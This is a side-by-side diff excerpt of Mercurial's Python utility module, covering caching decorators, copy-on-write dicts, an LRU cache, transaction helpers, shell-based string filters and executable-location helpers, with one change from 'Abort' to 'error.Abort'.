1140 if len(cache) == 0:
1141 cache.append(func())
1141 cache.append(func())
1142 return cache[0]
1142 return cache[0]
1143 return f
1143 return f
1144 cache = {}
1144 cache = {}
1145 if func.__code__.co_argcount == 1:
1145 if func.__code__.co_argcount == 1:
1146 # we gain a small amount of time because
1146 # we gain a small amount of time because
1147 # we don't need to pack/unpack the list
1147 # we don't need to pack/unpack the list
1148 def f(arg):
1148 def f(arg):
1149 if arg not in cache:
1149 if arg not in cache:
1150 cache[arg] = func(arg)
1150 cache[arg] = func(arg)
1151 return cache[arg]
1151 return cache[arg]
1152 else:
1152 else:
1153 def f(*args):
1153 def f(*args):
1154 if args not in cache:
1154 if args not in cache:
1155 cache[args] = func(*args)
1155 cache[args] = func(*args)
1156 return cache[args]
1156 return cache[args]
1157
1157
1158 return f
1158 return f
1159
1159
1160 class cow(object):
1160 class cow(object):
1161 """helper class to make copy-on-write easier
1161 """helper class to make copy-on-write easier
1162
1162
1163 Call preparewrite before doing any writes.
1163 Call preparewrite before doing any writes.
1164 """
1164 """
1165
1165
1166 def preparewrite(self):
1166 def preparewrite(self):
1167 """call this before writes, return self or a copied new object"""
1167 """call this before writes, return self or a copied new object"""
1168 if getattr(self, '_copied', 0):
1168 if getattr(self, '_copied', 0):
1169 self._copied -= 1
1169 self._copied -= 1
1170 return self.__class__(self)
1170 return self.__class__(self)
1171 return self
1171 return self
1172
1172
1173 def copy(self):
1173 def copy(self):
1174 """always do a cheap copy"""
1174 """always do a cheap copy"""
1175 self._copied = getattr(self, '_copied', 0) + 1
1175 self._copied = getattr(self, '_copied', 0) + 1
1176 return self
1176 return self
1177
1177
1178 class sortdict(collections.OrderedDict):
1178 class sortdict(collections.OrderedDict):
1179 '''a simple sorted dictionary
1179 '''a simple sorted dictionary
1180
1180
1181 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1181 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1182 >>> d2 = d1.copy()
1182 >>> d2 = d1.copy()
1183 >>> d2
1183 >>> d2
1184 sortdict([('a', 0), ('b', 1)])
1184 sortdict([('a', 0), ('b', 1)])
1185 >>> d2.update([(b'a', 2)])
1185 >>> d2.update([(b'a', 2)])
1186 >>> list(d2.keys()) # should still be in last-set order
1186 >>> list(d2.keys()) # should still be in last-set order
1187 ['b', 'a']
1187 ['b', 'a']
1188 '''
1188 '''
1189
1189
1190 def __setitem__(self, key, value):
1190 def __setitem__(self, key, value):
1191 if key in self:
1191 if key in self:
1192 del self[key]
1192 del self[key]
1193 super(sortdict, self).__setitem__(key, value)
1193 super(sortdict, self).__setitem__(key, value)
1194
1194
1195 if pycompat.ispypy:
1195 if pycompat.ispypy:
1196 # __setitem__() isn't called as of PyPy 5.8.0
1196 # __setitem__() isn't called as of PyPy 5.8.0
1197 def update(self, src):
1197 def update(self, src):
1198 if isinstance(src, dict):
1198 if isinstance(src, dict):
1199 src = src.iteritems()
1199 src = src.iteritems()
1200 for k, v in src:
1200 for k, v in src:
1201 self[k] = v
1201 self[k] = v
1202
1202
1203 class cowdict(cow, dict):
1203 class cowdict(cow, dict):
1204 """copy-on-write dict
1204 """copy-on-write dict
1205
1205
1206 Be sure to call d = d.preparewrite() before writing to d.
1206 Be sure to call d = d.preparewrite() before writing to d.
1207
1207
1208 >>> a = cowdict()
1208 >>> a = cowdict()
1209 >>> a is a.preparewrite()
1209 >>> a is a.preparewrite()
1210 True
1210 True
1211 >>> b = a.copy()
1211 >>> b = a.copy()
1212 >>> b is a
1212 >>> b is a
1213 True
1213 True
1214 >>> c = b.copy()
1214 >>> c = b.copy()
1215 >>> c is a
1215 >>> c is a
1216 True
1216 True
1217 >>> a = a.preparewrite()
1217 >>> a = a.preparewrite()
1218 >>> b is a
1218 >>> b is a
1219 False
1219 False
1220 >>> a is a.preparewrite()
1220 >>> a is a.preparewrite()
1221 True
1221 True
1222 >>> c = c.preparewrite()
1222 >>> c = c.preparewrite()
1223 >>> b is c
1223 >>> b is c
1224 False
1224 False
1225 >>> b is b.preparewrite()
1225 >>> b is b.preparewrite()
1226 True
1226 True
1227 """
1227 """
1228
1228
1229 class cowsortdict(cow, sortdict):
1229 class cowsortdict(cow, sortdict):
1230 """copy-on-write sortdict
1230 """copy-on-write sortdict
1231
1231
1232 Be sure to call d = d.preparewrite() before writing to d.
1232 Be sure to call d = d.preparewrite() before writing to d.
1233 """
1233 """
1234
1234
1235 class transactional(object):
1235 class transactional(object):
1236 """Base class for making a transactional type into a context manager."""
1236 """Base class for making a transactional type into a context manager."""
1237 __metaclass__ = abc.ABCMeta
1237 __metaclass__ = abc.ABCMeta
1238
1238
1239 @abc.abstractmethod
1239 @abc.abstractmethod
1240 def close(self):
1240 def close(self):
1241 """Successfully closes the transaction."""
1241 """Successfully closes the transaction."""
1242
1242
1243 @abc.abstractmethod
1243 @abc.abstractmethod
1244 def release(self):
1244 def release(self):
1245 """Marks the end of the transaction.
1245 """Marks the end of the transaction.
1246
1246
1247 If the transaction has not been closed, it will be aborted.
1247 If the transaction has not been closed, it will be aborted.
1248 """
1248 """
1249
1249
1250 def __enter__(self):
1250 def __enter__(self):
1251 return self
1251 return self
1252
1252
1253 def __exit__(self, exc_type, exc_val, exc_tb):
1253 def __exit__(self, exc_type, exc_val, exc_tb):
1254 try:
1254 try:
1255 if exc_type is None:
1255 if exc_type is None:
1256 self.close()
1256 self.close()
1257 finally:
1257 finally:
1258 self.release()
1258 self.release()
1259
1259
1260 @contextlib.contextmanager
1260 @contextlib.contextmanager
1261 def acceptintervention(tr=None):
1261 def acceptintervention(tr=None):
1262 """A context manager that closes the transaction on InterventionRequired
1262 """A context manager that closes the transaction on InterventionRequired
1263
1263
1264 If no transaction was provided, this simply runs the body and returns
1264 If no transaction was provided, this simply runs the body and returns
1265 """
1265 """
1266 if not tr:
1266 if not tr:
1267 yield
1267 yield
1268 return
1268 return
1269 try:
1269 try:
1270 yield
1270 yield
1271 tr.close()
1271 tr.close()
1272 except error.InterventionRequired:
1272 except error.InterventionRequired:
1273 tr.close()
1273 tr.close()
1274 raise
1274 raise
1275 finally:
1275 finally:
1276 tr.release()
1276 tr.release()
1277
1277
1278 @contextlib.contextmanager
1278 @contextlib.contextmanager
1279 def nullcontextmanager():
1279 def nullcontextmanager():
1280 yield
1280 yield
1281
1281
1282 class _lrucachenode(object):
1282 class _lrucachenode(object):
1283 """A node in a doubly linked list.
1283 """A node in a doubly linked list.
1284
1284
1285 Holds a reference to nodes on either side as well as a key-value
1285 Holds a reference to nodes on either side as well as a key-value
1286 pair for the dictionary entry.
1286 pair for the dictionary entry.
1287 """
1287 """
1288 __slots__ = (u'next', u'prev', u'key', u'value')
1288 __slots__ = (u'next', u'prev', u'key', u'value')
1289
1289
1290 def __init__(self):
1290 def __init__(self):
1291 self.next = None
1291 self.next = None
1292 self.prev = None
1292 self.prev = None
1293
1293
1294 self.key = _notset
1294 self.key = _notset
1295 self.value = None
1295 self.value = None
1296
1296
1297 def markempty(self):
1297 def markempty(self):
1298 """Mark the node as emptied."""
1298 """Mark the node as emptied."""
1299 self.key = _notset
1299 self.key = _notset
1300
1300
1301 class lrucachedict(object):
1301 class lrucachedict(object):
1302 """Dict that caches most recent accesses and sets.
1302 """Dict that caches most recent accesses and sets.
1303
1303
1304 The dict consists of an actual backing dict - indexed by original
1304 The dict consists of an actual backing dict - indexed by original
1305 key - and a doubly linked circular list defining the order of entries in
1305 key - and a doubly linked circular list defining the order of entries in
1306 the cache.
1306 the cache.
1307
1307
1308 The head node is the newest entry in the cache. If the cache is full,
1308 The head node is the newest entry in the cache. If the cache is full,
1309 we recycle head.prev and make it the new head. Cache accesses result in
1309 we recycle head.prev and make it the new head. Cache accesses result in
1310 the node being moved to before the existing head and being marked as the
1310 the node being moved to before the existing head and being marked as the
1311 new head node.
1311 new head node.
1312 """
1312 """
1313 def __init__(self, max):
1313 def __init__(self, max):
1314 self._cache = {}
1314 self._cache = {}
1315
1315
1316 self._head = head = _lrucachenode()
1316 self._head = head = _lrucachenode()
1317 head.prev = head
1317 head.prev = head
1318 head.next = head
1318 head.next = head
1319 self._size = 1
1319 self._size = 1
1320 self._capacity = max
1320 self._capacity = max
1321
1321
1322 def __len__(self):
1322 def __len__(self):
1323 return len(self._cache)
1323 return len(self._cache)
1324
1324
1325 def __contains__(self, k):
1325 def __contains__(self, k):
1326 return k in self._cache
1326 return k in self._cache
1327
1327
1328 def __iter__(self):
1328 def __iter__(self):
1329 # We don't have to iterate in cache order, but why not.
1329 # We don't have to iterate in cache order, but why not.
1330 n = self._head
1330 n = self._head
1331 for i in range(len(self._cache)):
1331 for i in range(len(self._cache)):
1332 yield n.key
1332 yield n.key
1333 n = n.next
1333 n = n.next
1334
1334
1335 def __getitem__(self, k):
1335 def __getitem__(self, k):
1336 node = self._cache[k]
1336 node = self._cache[k]
1337 self._movetohead(node)
1337 self._movetohead(node)
1338 return node.value
1338 return node.value
1339
1339
1340 def __setitem__(self, k, v):
1340 def __setitem__(self, k, v):
1341 node = self._cache.get(k)
1341 node = self._cache.get(k)
1342 # Replace existing value and mark as newest.
1342 # Replace existing value and mark as newest.
1343 if node is not None:
1343 if node is not None:
1344 node.value = v
1344 node.value = v
1345 self._movetohead(node)
1345 self._movetohead(node)
1346 return
1346 return
1347
1347
1348 if self._size < self._capacity:
1348 if self._size < self._capacity:
1349 node = self._addcapacity()
1349 node = self._addcapacity()
1350 else:
1350 else:
1351 # Grab the last/oldest item.
1351 # Grab the last/oldest item.
1352 node = self._head.prev
1352 node = self._head.prev
1353
1353
1354 # At capacity. Kill the old entry.
1354 # At capacity. Kill the old entry.
1355 if node.key is not _notset:
1355 if node.key is not _notset:
1356 del self._cache[node.key]
1356 del self._cache[node.key]
1357
1357
1358 node.key = k
1358 node.key = k
1359 node.value = v
1359 node.value = v
1360 self._cache[k] = node
1360 self._cache[k] = node
1361 # And mark it as newest entry. No need to adjust order since it
1361 # And mark it as newest entry. No need to adjust order since it
1362 # is already self._head.prev.
1362 # is already self._head.prev.
1363 self._head = node
1363 self._head = node
1364
1364
1365 def __delitem__(self, k):
1365 def __delitem__(self, k):
1366 node = self._cache.pop(k)
1366 node = self._cache.pop(k)
1367 node.markempty()
1367 node.markempty()
1368
1368
1369 # Temporarily mark as newest item before re-adjusting head to make
1369 # Temporarily mark as newest item before re-adjusting head to make
1370 # this node the oldest item.
1370 # this node the oldest item.
1371 self._movetohead(node)
1371 self._movetohead(node)
1372 self._head = node.next
1372 self._head = node.next
1373
1373
1374 # Additional dict methods.
1374 # Additional dict methods.
1375
1375
1376 def get(self, k, default=None):
1376 def get(self, k, default=None):
1377 try:
1377 try:
1378 return self._cache[k].value
1378 return self._cache[k].value
1379 except KeyError:
1379 except KeyError:
1380 return default
1380 return default
1381
1381
1382 def clear(self):
1382 def clear(self):
1383 n = self._head
1383 n = self._head
1384 while n.key is not _notset:
1384 while n.key is not _notset:
1385 n.markempty()
1385 n.markempty()
1386 n = n.next
1386 n = n.next
1387
1387
1388 self._cache.clear()
1388 self._cache.clear()
1389
1389
1390 def copy(self):
1390 def copy(self):
1391 result = lrucachedict(self._capacity)
1391 result = lrucachedict(self._capacity)
1392 n = self._head.prev
1392 n = self._head.prev
1393 # Iterate in oldest-to-newest order, so the copy has the right ordering
1393 # Iterate in oldest-to-newest order, so the copy has the right ordering
1394 for i in range(len(self._cache)):
1394 for i in range(len(self._cache)):
1395 result[n.key] = n.value
1395 result[n.key] = n.value
1396 n = n.prev
1396 n = n.prev
1397 return result
1397 return result
1398
1398
1399 def _movetohead(self, node):
1399 def _movetohead(self, node):
1400 """Mark a node as the newest, making it the new head.
1400 """Mark a node as the newest, making it the new head.
1401
1401
1402 When a node is accessed, it becomes the freshest entry in the LRU
1402 When a node is accessed, it becomes the freshest entry in the LRU
1403 list, which is denoted by self._head.
1403 list, which is denoted by self._head.
1404
1404
1405 Visually, let's make ``N`` the new head node (* denotes head):
1405 Visually, let's make ``N`` the new head node (* denotes head):
1406
1406
1407 previous/oldest <-> head <-> next/next newest
1407 previous/oldest <-> head <-> next/next newest
1408
1408
1409 ----<->--- A* ---<->-----
1409 ----<->--- A* ---<->-----
1410 | |
1410 | |
1411 E <-> D <-> N <-> C <-> B
1411 E <-> D <-> N <-> C <-> B
1412
1412
1413 To:
1413 To:
1414
1414
1415 ----<->--- N* ---<->-----
1415 ----<->--- N* ---<->-----
1416 | |
1416 | |
1417 E <-> D <-> C <-> B <-> A
1417 E <-> D <-> C <-> B <-> A
1418
1418
1419 This requires the following moves:
1419 This requires the following moves:
1420
1420
1421 C.next = D (node.prev.next = node.next)
1421 C.next = D (node.prev.next = node.next)
1422 D.prev = C (node.next.prev = node.prev)
1422 D.prev = C (node.next.prev = node.prev)
1423 E.next = N (head.prev.next = node)
1423 E.next = N (head.prev.next = node)
1424 N.prev = E (node.prev = head.prev)
1424 N.prev = E (node.prev = head.prev)
1425 N.next = A (node.next = head)
1425 N.next = A (node.next = head)
1426 A.prev = N (head.prev = node)
1426 A.prev = N (head.prev = node)
1427 """
1427 """
1428 head = self._head
1428 head = self._head
1429 # C.next = D
1429 # C.next = D
1430 node.prev.next = node.next
1430 node.prev.next = node.next
1431 # D.prev = C
1431 # D.prev = C
1432 node.next.prev = node.prev
1432 node.next.prev = node.prev
1433 # N.prev = E
1433 # N.prev = E
1434 node.prev = head.prev
1434 node.prev = head.prev
1435 # N.next = A
1435 # N.next = A
1436 # It is tempting to do just "head" here, however if node is
1436 # It is tempting to do just "head" here, however if node is
1437 # adjacent to head, this will do bad things.
1437 # adjacent to head, this will do bad things.
1438 node.next = head.prev.next
1438 node.next = head.prev.next
1439 # E.next = N
1439 # E.next = N
1440 node.next.prev = node
1440 node.next.prev = node
1441 # A.prev = N
1441 # A.prev = N
1442 node.prev.next = node
1442 node.prev.next = node
1443
1443
1444 self._head = node
1444 self._head = node
1445
1445
1446 def _addcapacity(self):
1446 def _addcapacity(self):
1447 """Add a node to the circular linked list.
1447 """Add a node to the circular linked list.
1448
1448
1449 The new node is inserted before the head node.
1449 The new node is inserted before the head node.
1450 """
1450 """
1451 head = self._head
1451 head = self._head
1452 node = _lrucachenode()
1452 node = _lrucachenode()
1453 head.prev.next = node
1453 head.prev.next = node
1454 node.prev = head.prev
1454 node.prev = head.prev
1455 node.next = head
1455 node.next = head
1456 head.prev = node
1456 head.prev = node
1457 self._size += 1
1457 self._size += 1
1458 return node
1458 return node
1459
1459
1460 def lrucachefunc(func):
1460 def lrucachefunc(func):
1461 '''cache most recent results of function calls'''
1461 '''cache most recent results of function calls'''
1462 cache = {}
1462 cache = {}
1463 order = collections.deque()
1463 order = collections.deque()
1464 if func.__code__.co_argcount == 1:
1464 if func.__code__.co_argcount == 1:
1465 def f(arg):
1465 def f(arg):
1466 if arg not in cache:
1466 if arg not in cache:
1467 if len(cache) > 20:
1467 if len(cache) > 20:
1468 del cache[order.popleft()]
1468 del cache[order.popleft()]
1469 cache[arg] = func(arg)
1469 cache[arg] = func(arg)
1470 else:
1470 else:
1471 order.remove(arg)
1471 order.remove(arg)
1472 order.append(arg)
1472 order.append(arg)
1473 return cache[arg]
1473 return cache[arg]
1474 else:
1474 else:
1475 def f(*args):
1475 def f(*args):
1476 if args not in cache:
1476 if args not in cache:
1477 if len(cache) > 20:
1477 if len(cache) > 20:
1478 del cache[order.popleft()]
1478 del cache[order.popleft()]
1479 cache[args] = func(*args)
1479 cache[args] = func(*args)
1480 else:
1480 else:
1481 order.remove(args)
1481 order.remove(args)
1482 order.append(args)
1482 order.append(args)
1483 return cache[args]
1483 return cache[args]
1484
1484
1485 return f
1485 return f
1486
1486
1487 class propertycache(object):
1487 class propertycache(object):
1488 def __init__(self, func):
1488 def __init__(self, func):
1489 self.func = func
1489 self.func = func
1490 self.name = func.__name__
1490 self.name = func.__name__
1491 def __get__(self, obj, type=None):
1491 def __get__(self, obj, type=None):
1492 result = self.func(obj)
1492 result = self.func(obj)
1493 self.cachevalue(obj, result)
1493 self.cachevalue(obj, result)
1494 return result
1494 return result
1495
1495
1496 def cachevalue(self, obj, value):
1496 def cachevalue(self, obj, value):
1497 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1497 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1498 obj.__dict__[self.name] = value
1498 obj.__dict__[self.name] = value
1499
1499
1500 def clearcachedproperty(obj, prop):
1500 def clearcachedproperty(obj, prop):
1501 '''clear a cached property value, if one has been set'''
1501 '''clear a cached property value, if one has been set'''
1502 if prop in obj.__dict__:
1502 if prop in obj.__dict__:
1503 del obj.__dict__[prop]
1503 del obj.__dict__[prop]
1504
1504
1505 def pipefilter(s, cmd):
1505 def pipefilter(s, cmd):
1506 '''filter string S through command CMD, returning its output'''
1506 '''filter string S through command CMD, returning its output'''
1507 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1507 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1508 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1508 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1509 pout, perr = p.communicate(s)
1509 pout, perr = p.communicate(s)
1510 return pout
1510 return pout
1511
1511
1512 def tempfilter(s, cmd):
1512 def tempfilter(s, cmd):
1513 '''filter string S through a pair of temporary files with CMD.
1513 '''filter string S through a pair of temporary files with CMD.
1514 CMD is used as a template to create the real command to be run,
1514 CMD is used as a template to create the real command to be run,
1515 with the strings INFILE and OUTFILE replaced by the real names of
1515 with the strings INFILE and OUTFILE replaced by the real names of
1516 the temporary files generated.'''
1516 the temporary files generated.'''
1517 inname, outname = None, None
1517 inname, outname = None, None
1518 try:
1518 try:
1519 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1519 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1520 fp = os.fdopen(infd, r'wb')
1520 fp = os.fdopen(infd, r'wb')
1521 fp.write(s)
1521 fp.write(s)
1522 fp.close()
1522 fp.close()
1523 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1523 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1524 os.close(outfd)
1524 os.close(outfd)
1525 cmd = cmd.replace('INFILE', inname)
1525 cmd = cmd.replace('INFILE', inname)
1526 cmd = cmd.replace('OUTFILE', outname)
1526 cmd = cmd.replace('OUTFILE', outname)
1527 code = os.system(cmd)
1527 code = os.system(cmd)
1528 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1528 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1529 code = 0
1529 code = 0
1530 if code:
1530 if code:
1531 raise Abort(_("command '%s' failed: %s") %
1531 raise error.Abort(_("command '%s' failed: %s") %
1532 (cmd, explainexit(code)))
1532 (cmd, explainexit(code)))
1533 return readfile(outname)
1533 return readfile(outname)
1534 finally:
1534 finally:
1535 try:
1535 try:
1536 if inname:
1536 if inname:
1537 os.unlink(inname)
1537 os.unlink(inname)
1538 except OSError:
1538 except OSError:
1539 pass
1539 pass
1540 try:
1540 try:
1541 if outname:
1541 if outname:
1542 os.unlink(outname)
1542 os.unlink(outname)
1543 except OSError:
1543 except OSError:
1544 pass
1544 pass
1545
1545
1546 filtertable = {
1546 filtertable = {
1547 'tempfile:': tempfilter,
1547 'tempfile:': tempfilter,
1548 'pipe:': pipefilter,
1548 'pipe:': pipefilter,
1549 }
1549 }
1550
1550
1551 def filter(s, cmd):
1551 def filter(s, cmd):
1552 "filter a string through a command that transforms its input to its output"
1552 "filter a string through a command that transforms its input to its output"
1553 for name, fn in filtertable.iteritems():
1553 for name, fn in filtertable.iteritems():
1554 if cmd.startswith(name):
1554 if cmd.startswith(name):
1555 return fn(s, cmd[len(name):].lstrip())
1555 return fn(s, cmd[len(name):].lstrip())
1556 return pipefilter(s, cmd)
1556 return pipefilter(s, cmd)
1557
1557
1558 def increasingchunks(source, min=1024, max=65536):
1558 def increasingchunks(source, min=1024, max=65536):
1559 '''return no less than min bytes per chunk while data remains,
1559 '''return no less than min bytes per chunk while data remains,
1560 doubling min after each chunk until it reaches max'''
1560 doubling min after each chunk until it reaches max'''
1561 def log2(x):
1561 def log2(x):
1562 if not x:
1562 if not x:
1563 return 0
1563 return 0
1564 i = 0
1564 i = 0
1565 while x:
1565 while x:
1566 x >>= 1
1566 x >>= 1
1567 i += 1
1567 i += 1
1568 return i - 1
1568 return i - 1
1569
1569
1570 buf = []
1570 buf = []
1571 blen = 0
1571 blen = 0
1572 for chunk in source:
1572 for chunk in source:
1573 buf.append(chunk)
1573 buf.append(chunk)
1574 blen += len(chunk)
1574 blen += len(chunk)
1575 if blen >= min:
1575 if blen >= min:
1576 if min < max:
1576 if min < max:
1577 min = min << 1
1577 min = min << 1
1578 nmin = 1 << log2(blen)
1578 nmin = 1 << log2(blen)
1579 if nmin > min:
1579 if nmin > min:
1580 min = nmin
1580 min = nmin
1581 if min > max:
1581 if min > max:
1582 min = max
1582 min = max
1583 yield ''.join(buf)
1583 yield ''.join(buf)
1584 blen = 0
1584 blen = 0
1585 buf = []
1585 buf = []
1586 if buf:
1586 if buf:
1587 yield ''.join(buf)
1587 yield ''.join(buf)
1588
1588
1589 Abort = error.Abort
1589 Abort = error.Abort
1590
1590
1591 def always(fn):
1591 def always(fn):
1592 return True
1592 return True
1593
1593
1594 def never(fn):
1594 def never(fn):
1595 return False
1595 return False
1596
1596
1597 def nogc(func):
1597 def nogc(func):
1598 """disable garbage collector
1598 """disable garbage collector
1599
1599
1600 Python's garbage collector triggers a GC each time a certain number of
1600 Python's garbage collector triggers a GC each time a certain number of
1601 container objects (the number being defined by gc.get_threshold()) are
1601 container objects (the number being defined by gc.get_threshold()) are
1602 allocated even when marked not to be tracked by the collector. Tracking has
1602 allocated even when marked not to be tracked by the collector. Tracking has
1603 no effect on when GCs are triggered, only on what objects the GC looks
1603 no effect on when GCs are triggered, only on what objects the GC looks
1604 into. As a workaround, disable GC while building complex (huge)
1604 into. As a workaround, disable GC while building complex (huge)
1605 containers.
1605 containers.
1606
1606
1607 This garbage collector issue have been fixed in 2.7. But it still affect
1607 This garbage collector issue have been fixed in 2.7. But it still affect
1608 CPython's performance.
1608 CPython's performance.
1609 """
1609 """
1610 def wrapper(*args, **kwargs):
1610 def wrapper(*args, **kwargs):
1611 gcenabled = gc.isenabled()
1611 gcenabled = gc.isenabled()
1612 gc.disable()
1612 gc.disable()
1613 try:
1613 try:
1614 return func(*args, **kwargs)
1614 return func(*args, **kwargs)
1615 finally:
1615 finally:
1616 if gcenabled:
1616 if gcenabled:
1617 gc.enable()
1617 gc.enable()
1618 return wrapper
1618 return wrapper
1619
1619
1620 if pycompat.ispypy:
1620 if pycompat.ispypy:
1621 # PyPy runs slower with gc disabled
1621 # PyPy runs slower with gc disabled
1622 nogc = lambda x: x
1622 nogc = lambda x: x
1623
1623
1624 def pathto(root, n1, n2):
1624 def pathto(root, n1, n2):
1625 '''return the relative path from one place to another.
1625 '''return the relative path from one place to another.
1626 root should use os.sep to separate directories
1626 root should use os.sep to separate directories
1627 n1 should use os.sep to separate directories
1627 n1 should use os.sep to separate directories
1628 n2 should use "/" to separate directories
1628 n2 should use "/" to separate directories
1629 returns an os.sep-separated path.
1629 returns an os.sep-separated path.
1630
1630
1631 If n1 is a relative path, it's assumed it's
1631 If n1 is a relative path, it's assumed it's
1632 relative to root.
1632 relative to root.
1633 n2 should always be relative to root.
1633 n2 should always be relative to root.
1634 '''
1634 '''
1635 if not n1:
1635 if not n1:
1636 return localpath(n2)
1636 return localpath(n2)
1637 if os.path.isabs(n1):
1637 if os.path.isabs(n1):
1638 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1638 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1639 return os.path.join(root, localpath(n2))
1639 return os.path.join(root, localpath(n2))
1640 n2 = '/'.join((pconvert(root), n2))
1640 n2 = '/'.join((pconvert(root), n2))
1641 a, b = splitpath(n1), n2.split('/')
1641 a, b = splitpath(n1), n2.split('/')
1642 a.reverse()
1642 a.reverse()
1643 b.reverse()
1643 b.reverse()
1644 while a and b and a[-1] == b[-1]:
1644 while a and b and a[-1] == b[-1]:
1645 a.pop()
1645 a.pop()
1646 b.pop()
1646 b.pop()
1647 b.reverse()
1647 b.reverse()
1648 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1648 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1649
1649
1650 def mainfrozen():
1650 def mainfrozen():
1651 """return True if we are a frozen executable.
1651 """return True if we are a frozen executable.
1652
1652
1653 The code supports py2exe (most common, Windows only) and tools/freeze
1653 The code supports py2exe (most common, Windows only) and tools/freeze
1654 (portable, not much used).
1654 (portable, not much used).
1655 """
1655 """
1656 return (safehasattr(sys, "frozen") or # new py2exe
1656 return (safehasattr(sys, "frozen") or # new py2exe
1657 safehasattr(sys, "importers") or # old py2exe
1657 safehasattr(sys, "importers") or # old py2exe
1658 imp.is_frozen(u"__main__")) # tools/freeze
1658 imp.is_frozen(u"__main__")) # tools/freeze
1659
1659
1660 # the location of data files matching the source code
1660 # the location of data files matching the source code
1661 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1661 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1662 # executable version (py2exe) doesn't support __file__
1662 # executable version (py2exe) doesn't support __file__
1663 datapath = os.path.dirname(pycompat.sysexecutable)
1663 datapath = os.path.dirname(pycompat.sysexecutable)
1664 else:
1664 else:
1665 datapath = os.path.dirname(pycompat.fsencode(__file__))
1665 datapath = os.path.dirname(pycompat.fsencode(__file__))
1666
1666
1667 i18n.setdatapath(datapath)
1667 i18n.setdatapath(datapath)
1668
1668
1669 _hgexecutable = None
1669 _hgexecutable = None
1670
1670
1671 def hgexecutable():
1671 def hgexecutable():
1672 """return location of the 'hg' executable.
1672 """return location of the 'hg' executable.
1673
1673
1674 Defaults to $HG or 'hg' in the search path.
1674 Defaults to $HG or 'hg' in the search path.
1675 """
1675 """
1676 if _hgexecutable is None:
1676 if _hgexecutable is None:
1677 hg = encoding.environ.get('HG')
1677 hg = encoding.environ.get('HG')
1678 mainmod = sys.modules[r'__main__']
1678 mainmod = sys.modules[r'__main__']
1679 if hg:
1679 if hg:
1680 _sethgexecutable(hg)
1680 _sethgexecutable(hg)
1681 elif mainfrozen():
1681 elif mainfrozen():
1682 if getattr(sys, 'frozen', None) == 'macosx_app':
1682 if getattr(sys, 'frozen', None) == 'macosx_app':
1683 # Env variable set by py2app
1683 # Env variable set by py2app
1684 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1684 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1685 else:
1685 else:
1686 _sethgexecutable(pycompat.sysexecutable)
1686 _sethgexecutable(pycompat.sysexecutable)
1687 elif (os.path.basename(
1687 elif (os.path.basename(
1688 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1688 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1689 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1689 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1690 else:
1690 else:
1691 exe = findexe('hg') or os.path.basename(sys.argv[0])
1691 exe = findexe('hg') or os.path.basename(sys.argv[0])
1692 _sethgexecutable(exe)
1692 _sethgexecutable(exe)
1693 return _hgexecutable
1693 return _hgexecutable
1694
1694
1695 def _sethgexecutable(path):
1695 def _sethgexecutable(path):
1696 """set location of the 'hg' executable"""
1696 """set location of the 'hg' executable"""
1697 global _hgexecutable
1697 global _hgexecutable
1698 _hgexecutable = path
1698 _hgexecutable = path
1699
1699
1700 def _testfileno(f, stdf):
1700 def _testfileno(f, stdf):
1701 fileno = getattr(f, 'fileno', None)
1701 fileno = getattr(f, 'fileno', None)
1702 try:
1702 try:
1703 return fileno and fileno() == stdf.fileno()
1703 return fileno and fileno() == stdf.fileno()
1704 except io.UnsupportedOperation:
1704 except io.UnsupportedOperation:
1705 return False # fileno() raised UnsupportedOperation
1705 return False # fileno() raised UnsupportedOperation
1706
1706
1707 def isstdin(f):
1707 def isstdin(f):
1708 return _testfileno(f, sys.__stdin__)
1708 return _testfileno(f, sys.__stdin__)
1709
1709
1710 def isstdout(f):
1710 def isstdout(f):
1711 return _testfileno(f, sys.__stdout__)
1711 return _testfileno(f, sys.__stdout__)
1712
1712
1713 def shellenviron(environ=None):
1713 def shellenviron(environ=None):
1714 """return environ with optional override, useful for shelling out"""
1714 """return environ with optional override, useful for shelling out"""
1715 def py2shell(val):
1715 def py2shell(val):
1716 'convert python object into string that is useful to shell'
1716 'convert python object into string that is useful to shell'
1717 if val is None or val is False:
1717 if val is None or val is False:
1718 return '0'
1718 return '0'
1719 if val is True:
1719 if val is True:
1720 return '1'
1720 return '1'
1721 return pycompat.bytestr(val)
1721 return pycompat.bytestr(val)
1722 env = dict(encoding.environ)
1722 env = dict(encoding.environ)
1723 if environ:
1723 if environ:
1724 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1724 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1725 env['HG'] = hgexecutable()
1725 env['HG'] = hgexecutable()
1726 return env
1726 return env
1727
1727
1728 def system(cmd, environ=None, cwd=None, out=None):
1728 def system(cmd, environ=None, cwd=None, out=None):
1729 '''enhanced shell command execution.
1729 '''enhanced shell command execution.
1730 run with environment maybe modified, maybe in different dir.
1730 run with environment maybe modified, maybe in different dir.
1731
1731
1732 if out is specified, it is assumed to be a file-like object that has a
1732 if out is specified, it is assumed to be a file-like object that has a
1733 write() method. stdout and stderr will be redirected to out.'''
1733 write() method. stdout and stderr will be redirected to out.'''
1734 try:
1734 try:
1735 stdout.flush()
1735 stdout.flush()
1736 except Exception:
1736 except Exception:
1737 pass
1737 pass
